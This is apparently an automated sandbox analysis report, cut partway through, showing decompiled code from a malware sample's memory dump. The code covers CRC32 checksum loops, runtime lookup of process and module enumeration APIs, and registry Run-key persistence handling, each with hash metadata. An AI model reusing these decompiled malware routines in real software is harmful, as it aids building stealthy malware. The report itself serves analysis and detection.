                                    					_t141 =  *(0x24058a24 + _t43 + 0x1000) ^  *(0x24058a24 + _t46 + 0x1400) ^  *(0x24058a24 + _t49 + 0x1800) ^  *(0x24058a24 + _t52 + 0x1c00) ^  *_t173;
                                    					_t174 =  &(_t173[1]);
                                    					_t279 = _t141 & 0x000000ff;
                                    					_t215 = _t141 >> 0x00000008 & 0x000000ff;
                                    					_t55 = _t279 * 4; // 0x0
                                    					_t58 = _t215 * 4; // 0x0
                                    					_t218 = _t141 >> 0x00000010 & 0x000000ff;
                                    					_t142 = _t141 >> 0x18;
                                    					_t61 = _t218 * 4; // 0x0
                                    					_t64 = _t142 * 4; // 0x0
                                    					_t144 =  *(0x24058a24 + _t55 + 0x1000) ^  *(0x24058a24 + _t58 + 0x1400) ^  *(0x24058a24 + _t61 + 0x1800) ^  *(0x24058a24 + _t64 + 0x1c00) ^  *_t174;
                                    					_t175 =  &(_t174[1]);
                                    					_t285 = _t144 & 0x000000ff;
                                    					_t221 = _t144 >> 0x00000008 & 0x000000ff;
                                    					_t67 = _t285 * 4; // 0x0
                                    					_t70 = _t221 * 4; // 0x0
                                    					_t224 = _t144 >> 0x00000010 & 0x000000ff;
                                    					_t145 = _t144 >> 0x18;
                                    					_t73 = _t224 * 4; // 0x0
                                    					_t76 = _t145 * 4; // 0x0
                                    					_t147 =  *(0x24058a24 + _t67 + 0x1000) ^  *(0x24058a24 + _t70 + 0x1400) ^  *(0x24058a24 + _t73 + 0x1800) ^  *(0x24058a24 + _t76 + 0x1c00) ^  *_t175;
                                    					_t162 =  &(_t175[1]);
                                    					_t291 = _t147 & 0x000000ff;
                                    					_t227 = _t147 >> 0x00000008 & 0x000000ff;
                                    					_t79 = _t291 * 4; // 0x0
                                    					_t82 = _t227 * 4; // 0x0
                                    					_t230 = _t147 >> 0x00000010 & 0x000000ff;
                                    					_t148 = _t147 >> 0x18;
                                    					_t85 = _t230 * 4; // 0x0
                                    					_t88 = _t148 * 4; // 0x0
                                    					_t150 =  *(0x24058a24 + _t79 + 0x1000) ^  *(0x24058a24 + _t82 + 0x1400) ^  *(0x24058a24 + _t85 + 0x1800) ^  *(0x24058a24 + _t88 + 0x1c00) ^  *_t162;
                                    					_t297 = _t150 & 0x000000ff;
                                    					_t233 = _t150 >> 0x00000008 & 0x000000ff;
                                    					_t91 = _t297 * 4; // 0x0
                                    					_t94 = _t233 * 4; // 0x0
                                    					_t236 = _t150 >> 0x00000010 & 0x000000ff;
                                    					_t151 = _t150 >> 0x18;
                                    					_t97 = _t236 * 4; // 0x0
                                    					_t100 = _t151 * 4; // 0x0
                                    					_t154 = _t154 - 0x20;
                                    					_t121 =  *(0x24058a24 + _t91 + 0x1000) ^  *(0x24058a24 + _t94 + 0x1400) ^  *(0x24058a24 + _t97 + 0x1800) ^  *(0x24058a24 + _t100 + 0x1c00);
                                    				}
                                    				while(_t154 >= 4) {
                                    					_t162 =  &(_t162[1]);
                                    					_t127 = _t121 ^  *_t162;
                                    					_t249 = _t127 & 0x000000ff;
                                    					_t185 = _t127 >> 0x00000008 & 0x000000ff;
                                    					_t103 = _t249 * 4; // 0x0
                                    					_t106 = _t185 * 4; // 0x0
                                    					_t188 = _t127 >> 0x00000010 & 0x000000ff;
                                    					_t128 = _t127 >> 0x18;
                                    					_t109 = _t188 * 4; // 0x0
                                    					_t112 = _t128 * 4; // 0x0
                                    					_t154 = _t154 - 4;
                                    					_t121 =  *(0x24058a24 + _t103 + 0x1000) ^  *(0x24058a24 + _t106 + 0x1400) ^  *(0x24058a24 + _t109 + 0x1800) ^  *(0x24058a24 + _t112 + 0x1c00);
                                    				}
                                    				_t163 =  &(_t162[1]);
                                    				if(_t154 != 0) {
                                    					do {
                                    						_t115 = (_t121 >> 0x00000018 ^  *_t163 & 0x000000ff) * 4; // 0x0
                                    						_t163 =  &(_t163[1]);
                                    						_t121 =  *(0x24058a24 + _t115 + 0x1000) ^ _t121 << 0x00000008;
                                    						_t154 = _t154 - 1;
                                    					} while (_t154 != 0);
                                    				}
				return ( !_t121 >> 0x18) + ( !_t121 >> 0x00000008 & 0x0000ff00) + (( !_t121 & 0x0000ff00) << 8) + (( !_t121 & 0x000000ff) << 0x18); // decompiler artifact fixed: final byte used undeclared _t122, which is the bit-inverted _t121
                                    			}

                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ce360011dbc80d7d50c67357545da675b3ccca93646a54bcbfa7484c31cd74b6
                                    • Instruction ID: 756408b15116d4ba90c528348a3d483700a371b5a497628bb5f80aaf169001e1
                                    • Opcode Fuzzy Hash: ce360011dbc80d7d50c67357545da675b3ccca93646a54bcbfa7484c31cd74b6
                                    • Instruction Fuzzy Hash: 31816C73D214374BEB628EA88C443A17392AFCC39EF5B46B0ED05BB64AD534BD5186C0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E24035970(signed int __eax, void* __ecx, signed char __edx) {
                                    				signed int _t107;
                                    				unsigned int _t110;
                                    				unsigned int _t112;
                                    				unsigned int _t115;
                                    				unsigned int _t118;
                                    				unsigned int _t121;
                                    				unsigned int _t124;
                                    				unsigned int _t127;
                                    				unsigned int _t130;
                                    				unsigned int _t133;
                                    				void* _t137;
                                    				signed char _t138;
                                    				signed int* _t139;
                                    				signed int* _t140;
                                    				signed int* _t141;
                                    				signed int* _t142;
                                    				signed int* _t143;
                                    				signed int* _t144;
                                    				signed int* _t145;
                                    				signed int _t148;
                                    				signed int _t154;
                                    				signed int _t160;
                                    				signed int _t166;
                                    				signed int _t172;
                                    				signed int _t178;
                                    				signed int _t184;
                                    				signed int _t190;
                                    				signed int _t196;
                                    				signed int _t202;
                                    				signed int _t206;
                                    				signed int _t212;
                                    				signed int _t218;
                                    				signed int _t224;
                                    				signed int _t230;
                                    				signed int _t236;
                                    				signed int _t242;
                                    				signed int _t248;
                                    				signed int _t254;
                                    				signed int _t260;
                                    
                                    				_t138 = __edx;
                                    				_t137 = __ecx;
                                    				_t107 =  !__eax;
                                    				while(_t137 != 0 && (_t138 & 0x00000003) != 0) {
                                    					_t260 =  *_t138 & 0x000000ff ^ _t107;
                                    					_t138 = _t138 + 1;
                                    					_t137 = _t137 - 1;
                                    					_t107 =  *(0x24058a24 + (_t260 & 0x000000ff) * 4) ^ _t107 >> 0x00000008;
                                    				}
                                    				while(_t137 >= 0x20) {
                                    					_t112 = _t107 ^  *_t138;
                                    					_t139 = _t138 + 4;
                                    					_t212 = _t112 & 0x000000ff;
                                    					_t154 = _t112 >> 0x00000008 & 0x000000ff;
                                    					_t6 = _t212 * 4; // 0x0
                                    					_t9 = _t154 * 4; // 0x0
                                    					_t12 = (_t112 >> 0x00000010 & 0x000000ff) * 4; // 0x0
                                    					_t115 =  *(0x24058a24 + _t6 + 0xc00) ^  *(0x24058a24 + _t9 + 0x800) ^  *(0x24058a24 + _t12 + 0x400) ^  *(0x24058a24 + (_t112 >> 0x18) * 4) ^  *_t139;
                                    					_t140 =  &(_t139[1]);
                                    					_t218 = _t115 & 0x000000ff;
                                    					_t160 = _t115 >> 0x00000008 & 0x000000ff;
                                    					_t17 = _t218 * 4; // 0x0
                                    					_t20 = _t160 * 4; // 0x0
                                    					_t23 = (_t115 >> 0x00000010 & 0x000000ff) * 4; // 0x0
                                    					_t118 =  *(0x24058a24 + _t17 + 0xc00) ^  *(0x24058a24 + _t20 + 0x800) ^  *(0x24058a24 + _t23 + 0x400) ^  *(0x24058a24 + (_t115 >> 0x18) * 4) ^  *_t140;
                                    					_t141 =  &(_t140[1]);
                                    					_t224 = _t118 & 0x000000ff;
                                    					_t166 = _t118 >> 0x00000008 & 0x000000ff;
                                    					_t28 = _t224 * 4; // 0x0
                                    					_t31 = _t166 * 4; // 0x0
                                    					_t34 = (_t118 >> 0x00000010 & 0x000000ff) * 4; // 0x0
                                    					_t121 =  *(0x24058a24 + _t28 + 0xc00) ^  *(0x24058a24 + _t31 + 0x800) ^  *(0x24058a24 + _t34 + 0x400) ^  *(0x24058a24 + (_t118 >> 0x18) * 4) ^  *_t141;
                                    					_t142 =  &(_t141[1]);
                                    					_t230 = _t121 & 0x000000ff;
                                    					_t172 = _t121 >> 0x00000008 & 0x000000ff;
                                    					_t39 = _t230 * 4; // 0x0
                                    					_t42 = _t172 * 4; // 0x0
                                    					_t45 = (_t121 >> 0x00000010 & 0x000000ff) * 4; // 0x0
                                    					_t124 =  *(0x24058a24 + _t39 + 0xc00) ^  *(0x24058a24 + _t42 + 0x800) ^  *(0x24058a24 + _t45 + 0x400) ^  *(0x24058a24 + (_t121 >> 0x18) * 4) ^  *_t142;
                                    					_t143 =  &(_t142[1]);
                                    					_t236 = _t124 & 0x000000ff;
                                    					_t178 = _t124 >> 0x00000008 & 0x000000ff;
                                    					_t50 = _t236 * 4; // 0x0
                                    					_t53 = _t178 * 4; // 0x0
                                    					_t56 = (_t124 >> 0x00000010 & 0x000000ff) * 4; // 0x0
                                    					_t127 =  *(0x24058a24 + _t50 + 0xc00) ^  *(0x24058a24 + _t53 + 0x800) ^  *(0x24058a24 + _t56 + 0x400) ^  *(0x24058a24 + (_t124 >> 0x18) * 4) ^  *_t143;
                                    					_t144 =  &(_t143[1]);
                                    					_t242 = _t127 & 0x000000ff;
                                    					_t184 = _t127 >> 0x00000008 & 0x000000ff;
                                    					_t61 = _t242 * 4; // 0x0
                                    					_t64 = _t184 * 4; // 0x0
                                    					_t67 = (_t127 >> 0x00000010 & 0x000000ff) * 4; // 0x0
                                    					_t130 =  *(0x24058a24 + _t61 + 0xc00) ^  *(0x24058a24 + _t64 + 0x800) ^  *(0x24058a24 + _t67 + 0x400) ^  *(0x24058a24 + (_t127 >> 0x18) * 4) ^  *_t144;
                                    					_t145 =  &(_t144[1]);
                                    					_t248 = _t130 & 0x000000ff;
                                    					_t190 = _t130 >> 0x00000008 & 0x000000ff;
                                    					_t72 = _t248 * 4; // 0x0
                                    					_t75 = _t190 * 4; // 0x0
                                    					_t78 = (_t130 >> 0x00000010 & 0x000000ff) * 4; // 0x0
                                    					_t133 =  *(0x24058a24 + _t72 + 0xc00) ^  *(0x24058a24 + _t75 + 0x800) ^  *(0x24058a24 + _t78 + 0x400) ^  *(0x24058a24 + (_t130 >> 0x18) * 4) ^  *_t145;
                                    					_t138 =  &(_t145[1]);
                                    					_t254 = _t133 & 0x000000ff;
                                    					_t196 = _t133 >> 0x00000008 & 0x000000ff;
                                    					_t83 = _t254 * 4; // 0x0
                                    					_t86 = _t196 * 4; // 0x0
                                    					_t89 = (_t133 >> 0x00000010 & 0x000000ff) * 4; // 0x0
                                    					_t137 = _t137 - 0x20;
                                    					_t107 =  *(0x24058a24 + _t83 + 0xc00) ^  *(0x24058a24 + _t86 + 0x800) ^  *(0x24058a24 + _t89 + 0x400) ^  *(0x24058a24 + (_t133 >> 0x18) * 4);
                                    				}
                                    				while(_t137 >= 4) {
                                    					_t110 = _t107 ^  *_t138;
                                    					_t138 = _t138 + 4;
                                    					_t206 = _t110 & 0x000000ff;
                                    					_t148 = _t110 >> 0x00000008 & 0x000000ff;
                                    					_t94 = _t206 * 4; // 0x0
                                    					_t97 = _t148 * 4; // 0x0
                                    					_t100 = (_t110 >> 0x00000010 & 0x000000ff) * 4; // 0x0
                                    					_t137 = _t137 - 4;
                                    					_t107 =  *(0x24058a24 + _t94 + 0xc00) ^  *(0x24058a24 + _t97 + 0x800) ^  *(0x24058a24 + _t100 + 0x400) ^  *(0x24058a24 + (_t110 >> 0x18) * 4);
                                    				}
                                    				if(_t137 != 0) {
                                    					do {
                                    						_t202 = ( *_t138 & 0x000000ff ^ _t107) & 0x000000ff;
                                    						_t138 = _t138 + 1;
                                    						_t107 =  *(0x24058a24 + _t202 * 4) ^ _t107 >> 0x00000008;
                                    						_t137 = _t137 - 1;
                                    					} while (_t137 != 0);
                                    				}
                                    				return  !_t107;
                                    			}

                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 619597ac5c60795fb4c4f482cd48e8a4deb11bc390405c7789798b2838109db3
                                    • Instruction ID: 4025fb110d6d374878c9738f5267b3f385e9db90dfb0f35894ebf346fe4b9e84
                                    • Opcode Fuzzy Hash: 619597ac5c60795fb4c4f482cd48e8a4deb11bc390405c7789798b2838109db3
                                    • Instruction Fuzzy Hash: FB712873D214779BEB608EA8C8443617392EFC921CF6B46B0DE05BB646C634BD5296D0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E2401544E() {
                                    
                                    				goto ( *0x2406449c);
                                    			}



                                    0x24015450

                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5a4504d12df21fadabd26575d1ba31d84357f6890d4c8850351233ff21e7c565
                                    • Instruction ID: 5fc67294772d053e76106f30a5e04b0145d0243dfd3a6eec38c209d5f2cc8dc6
                                    • Opcode Fuzzy Hash: 5a4504d12df21fadabd26575d1ba31d84357f6890d4c8850351233ff21e7c565
                                    • Instruction Fuzzy Hash:
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E2401528E() {
                                    
                                    				goto ( *0x2406457c);
                                    			}



                                    0x24015290

                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8563cc2b62b4566382a34513e251ee5164fcfe06a5e91d5372afb1e6b59fd56c
                                    • Instruction ID: ca9d780cdcaf49222eb9e69980436e315a9c9644ea773c47ee1a75ad75f8d7e1
                                    • Opcode Fuzzy Hash: 8563cc2b62b4566382a34513e251ee5164fcfe06a5e91d5372afb1e6b59fd56c
                                    • Instruction Fuzzy Hash:
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E2403BD34() {
                                    
                                    				if( *0x2405cacc != 0) {
                                    					L4:
                                    					return 1;
                                    				} else {
                                    					 *0x2405cacc = LoadLibraryA("PSAPI.dll");
                                    					if( *0x2405cacc >= 0x20) {
                                    						 *0x2405cad0 = GetProcAddress( *0x2405cacc, "EnumProcesses");
                                    						 *0x2405cad4 = GetProcAddress( *0x2405cacc, "EnumProcessModules");
                                    						 *0x2405cad8 = GetProcAddress( *0x2405cacc, "GetModuleBaseNameA");
                                    						 *0x2405cadc = GetProcAddress( *0x2405cacc, "GetModuleFileNameExA");
                                    						 *0x2405cae0 = GetProcAddress( *0x2405cacc, "GetModuleBaseNameA");
                                    						 *0x2405cae4 = GetProcAddress( *0x2405cacc, "GetModuleFileNameExA");
                                    						 *0x2405cae8 = GetProcAddress( *0x2405cacc, "GetModuleBaseNameW");
                                    						 *0x2405caec = GetProcAddress( *0x2405cacc, "GetModuleFileNameExW");
                                    						 *0x2405caf0 = GetProcAddress( *0x2405cacc, "GetModuleInformation");
                                    						 *0x2405caf4 = GetProcAddress( *0x2405cacc, "EmptyWorkingSet");
                                    						 *0x2405caf8 = GetProcAddress( *0x2405cacc, "QueryWorkingSet");
                                    						 *0x2405cafc = GetProcAddress( *0x2405cacc, "InitializeProcessForWsWatch");
                                    						 *0x2405cb00 = GetProcAddress( *0x2405cacc, "GetMappedFileNameA");
                                    						 *0x2405cb04 = GetProcAddress( *0x2405cacc, "GetDeviceDriverBaseNameA");
                                    						 *0x2405cb08 = GetProcAddress( *0x2405cacc, "GetDeviceDriverFileNameA");
                                    						 *0x2405cb0c = GetProcAddress( *0x2405cacc, "GetMappedFileNameA");
                                    						 *0x2405cb10 = GetProcAddress( *0x2405cacc, "GetDeviceDriverBaseNameA");
                                    						 *0x2405cb14 = GetProcAddress( *0x2405cacc, "GetDeviceDriverFileNameA");
                                    						 *0x2405cb18 = GetProcAddress( *0x2405cacc, "GetMappedFileNameW");
                                    						 *0x2405cb1c = GetProcAddress( *0x2405cacc, "GetDeviceDriverBaseNameW");
                                    						 *0x2405cb20 = GetProcAddress( *0x2405cacc, "GetDeviceDriverFileNameW");
                                    						 *0x2405cb24 = GetProcAddress( *0x2405cacc, "EnumDeviceDrivers");
                                    						 *0x2405cb28 = GetProcAddress( *0x2405cacc, "GetProcessMemoryInfo");
                                    						goto L4;
                                    					} else {
                                    						 *0x2405cacc = 0;
                                    						return 0;
                                    					}
                                    				}
                                    			}



                                    0x2403bd3d
                                    0x2403befa
                                    0x2403befd
                                    0x2403bd43
                                    0x2403bd4d
                                    0x2403bd52
                                    0x2403bd69
                                    0x2403bd7b
                                    0x2403bd8d
                                    0x2403bd9f
                                    0x2403bdb1
                                    0x2403bdc3
                                    0x2403bdd5
                                    0x2403bde7
                                    0x2403bdf9
                                    0x2403be0b
                                    0x2403be1d
                                    0x2403be2f
                                    0x2403be41
                                    0x2403be53
                                    0x2403be65
                                    0x2403be77
                                    0x2403be89
                                    0x2403be9b
                                    0x2403bead
                                    0x2403bebf
                                    0x2403bed1
                                    0x2403bee3
                                    0x2403bef5
                                    0x00000000
                                    0x2403bd54
                                    0x2403bd56
                                    0x2403bd5b
                                    0x2403bd5b
                                    0x2403bd52

                                    APIs
                                    • LoadLibraryA.KERNEL32(PSAPI.dll,?,2403C0D5), ref: 2403BD48
                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 2403BD64
                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 2403BD76
                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 2403BD88
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 2403BD9A
                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 2403BDAC
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 2403BDBE
                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 2403BDD0
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 2403BDE2
                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 2403BDF4
                                    • GetProcAddress.KERNEL32(00000000,EmptyWorkingSet), ref: 2403BE06
                                    • GetProcAddress.KERNEL32(00000000,QueryWorkingSet), ref: 2403BE18
                                    • GetProcAddress.KERNEL32(00000000,InitializeProcessForWsWatch), ref: 2403BE2A
                                    • GetProcAddress.KERNEL32(00000000,GetMappedFileNameA), ref: 2403BE3C
                                    • GetProcAddress.KERNEL32(00000000,GetDeviceDriverBaseNameA), ref: 2403BE4E
                                    • GetProcAddress.KERNEL32(00000000,GetDeviceDriverFileNameA), ref: 2403BE60
                                    • GetProcAddress.KERNEL32(00000000,GetMappedFileNameA), ref: 2403BE72
                                    • GetProcAddress.KERNEL32(00000000,GetDeviceDriverBaseNameA), ref: 2403BE84
                                    • GetProcAddress.KERNEL32(00000000,GetDeviceDriverFileNameA), ref: 2403BE96
                                    • GetProcAddress.KERNEL32(00000000,GetMappedFileNameW), ref: 2403BEA8
                                    • GetProcAddress.KERNEL32(00000000,GetDeviceDriverBaseNameW), ref: 2403BEBA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: EmptyWorkingSet$EnumDeviceDrivers$EnumProcessModules$EnumProcesses$GetDeviceDriverBaseNameA$GetDeviceDriverBaseNameW$GetDeviceDriverFileNameA$GetDeviceDriverFileNameW$GetMappedFileNameA$GetMappedFileNameW$GetModuleBaseNameA$GetModuleBaseNameW$GetModuleFileNameExA$GetModuleFileNameExW$GetModuleInformation$GetProcessMemoryInfo$InitializeProcessForWsWatch$PSAPI.dll$QueryWorkingSet
                                    • API String ID: 2238633743-2267155864
                                    • Opcode ID: 8f5bc80e15c7e2906b0eea499438a1141eafc75c87cc3d95cbb3401759216367
                                    • Instruction ID: d3cdc4a8aa122c4895603ab0ff11bca53f3cfd594fe5426d88abbaad1c9b5486
                                    • Opcode Fuzzy Hash: 8f5bc80e15c7e2906b0eea499438a1141eafc75c87cc3d95cbb3401759216367
                                    • Instruction Fuzzy Hash: 04417FB1914610AFEB01EFB9C8D4F2A3FA8FB162487401569F404EF64DD639DAC49F92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E24015564() {
                                    
                                    				if( *0x2405b698 == 0) {
                                    					 *0x2405b698 = GetModuleHandleA("kernel32.dll");
                                    					if( *0x2405b698 != 0) {
                                    						 *0x2405b69c = GetProcAddress( *0x2405b698, "CreateToolhelp32Snapshot");
                                    						 *0x2405b6a0 = GetProcAddress( *0x2405b698, "Heap32ListFirst");
                                    						 *0x2405b6a4 = GetProcAddress( *0x2405b698, "Heap32ListNext");
                                    						 *0x2405b6a8 = GetProcAddress( *0x2405b698, "Heap32First");
                                    						 *0x2405b6ac = GetProcAddress( *0x2405b698, "Heap32Next");
                                    						 *0x2405b6b0 = GetProcAddress( *0x2405b698, "Toolhelp32ReadProcessMemory");
                                    						 *0x2405b6b4 = GetProcAddress( *0x2405b698, "Process32First");
                                    						 *0x2405b6b8 = GetProcAddress( *0x2405b698, "Process32Next");
                                    						 *0x2405b6bc = GetProcAddress( *0x2405b698, "Process32FirstW");
                                    						 *0x2405b6c0 = GetProcAddress( *0x2405b698, "Process32NextW");
                                    						 *0x2405b6c4 = GetProcAddress( *0x2405b698, "Thread32First");
                                    						 *0x2405b6c8 = GetProcAddress( *0x2405b698, "Thread32Next");
                                    						 *0x2405b6cc = GetProcAddress( *0x2405b698, "Module32First");
                                    						 *0x2405b6d0 = GetProcAddress( *0x2405b698, "Module32Next");
                                    						 *0x2405b6d4 = GetProcAddress( *0x2405b698, "Module32FirstW");
                                    						 *0x2405b6d8 = GetProcAddress( *0x2405b698, "Module32NextW");
                                    					}
                                    				}
                                    				if( *0x2405b698 == 0 ||  *0x2405b69c == 0) {
                                    					return 0;
                                    				} else {
                                    					return 1;
                                    				}
                                    			}



                                    0x2401556d
                                    0x2401557d
                                    0x24015582
                                    0x24015595
                                    0x240155a7
                                    0x240155b9
                                    0x240155cb
                                    0x240155dd
                                    0x240155ef
                                    0x24015601
                                    0x24015613
                                    0x24015625
                                    0x24015637
                                    0x24015649
                                    0x2401565b
                                    0x2401566d
                                    0x2401567f
                                    0x24015691
                                    0x240156a3
                                    0x240156a3
                                    0x24015582
                                    0x240156ab
                                    0x240156b9
                                    0x240156ba
                                    0x240156bd
                                    0x240156bd

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,240157EB,?,?,2402E487), ref: 24015578
                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 24015590
                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 240155A2
                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 240155B4
                                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 240155C6
                                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 240155D8
                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 240155EA
                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 240155FC
                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 2401560E
                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 24015620
                                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 24015632
                                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 24015644
                                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 24015656
                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 24015668
                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 2401567A
                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 2401568C
                                    • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 2401569E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$HandleModule
                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                    • API String ID: 667068680-597814768
                                    • Opcode ID: a47529a7dc0de6d09de47caf561174e7674bd0a321a707ba09a43ba927510138
                                    • Instruction ID: bdc3c3d6c9dac89747669548f5dd8aa332930fedcc04540d8a61342f969d8403
                                    • Opcode Fuzzy Hash: a47529a7dc0de6d09de47caf561174e7674bd0a321a707ba09a43ba927510138
                                    • Instruction Fuzzy Hash: CB3128F49116109FEB029FB9D8D5F2D3AB9FF162447800565F408EF248D639AAC48F95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 85%
                                    			E24044638(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                    				char _v8;
                                    				char _v12;
                                    				char _v16;
                                    				intOrPtr _t12;
                                    				void** _t13;
                                    				void** _t16;
                                    				intOrPtr* _t19;
                                    				intOrPtr* _t25;
                                    				intOrPtr* _t28;
                                    				intOrPtr* _t29;
                                    				intOrPtr* _t30;
                                    				intOrPtr* _t31;
                                    				intOrPtr* _t33;
                                    				intOrPtr* _t44;
                                    				intOrPtr* _t52;
                                    				intOrPtr* _t60;
                                    				intOrPtr* _t68;
                                    				intOrPtr* _t76;
                                    				intOrPtr* _t84;
                                    				void** _t97;
                                    				intOrPtr* _t101;
                                    				intOrPtr* _t103;
                                    				intOrPtr _t105;
                                    				void* _t107;
                                    				void* _t108;
                                    				intOrPtr _t111;
                                    
                                    				_t108 = __esi;
                                    				_t107 = __edi;
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_t97 =  &_v8;
                                    				_push(_t111);
                                    				_push(0x24044885);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t111;
                                    				_t101 =  *0x2405ac14; // 0x2405b94c
                                    				E24013388( &_v12, 0x2404489c,  *_t101);
                                    				_t12 = E24014F18(0, 0, E24013534(_v12));
                                    				_t103 =  *0x2405abe4; // 0x2405b998
                                    				 *_t103 = _t12;
                                    				_t113 =  *0x2405aa88;
                                    				if( *0x2405aa88 != 0) {
                                    					E24037CD4(0x240448ac, _t113);
                                    					Sleep(0x64);
                                    					E24037CD4(0, _t113);
                                    					 *0x2405aa88 = 0;
                                    				}
                                    				_t13 =  *0x2405ac18; // 0x240570d8
                                    				CloseHandle( *_t13);
                                    				_t16 =  *0x2405ab38; // 0x2405b990
                                    				CloseHandle( *_t16);
                                    				_t19 =  *0x2405ac24; // 0x2405b980
                                    				E24016588( *_t19, _t97,  &_v16, _t107, _t108, 0);
                                    				SetFileAttributesA(E24013534(_v16), 0x80);
                                    				_t25 =  *0x2405ab24; // 0x240632f0
                                    				E24016634( *_t25, _t97, _t107, _t108, 0);
                                    				_t28 =  *0x2405ab5c; // 0x2405b8f8
                                    				if( *_t28 != 0) {
                                    					RegOpenKeyA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t97);
                                    					_t84 =  *0x2405ab5c; // 0x2405b8f8
                                    					RegDeleteValueA( *_t97, E24013534( *_t84));
                                    					RegCloseKey( *_t97);
                                    				}
                                    				_t29 =  *0x2405ab88; // 0x2405b8fc
                                    				if( *_t29 != 0) {
                                    					RegOpenKeyA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t97);
                                    					_t76 =  *0x2405ab88; // 0x2405b8fc
                                    					RegDeleteValueA( *_t97, E24013534( *_t76));
                                    					RegCloseKey( *_t97);
                                    				}
                                    				_t30 =  *0x2405abd0; // 0x2405b900
                                    				if( *_t30 != 0) {
                                    					RegOpenKeyA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t97);
                                    					_t60 =  *0x2405abd0; // 0x2405b900
                                    					RegDeleteValueA( *_t97, E24013534( *_t60));
                                    					RegCloseKey( *_t97);
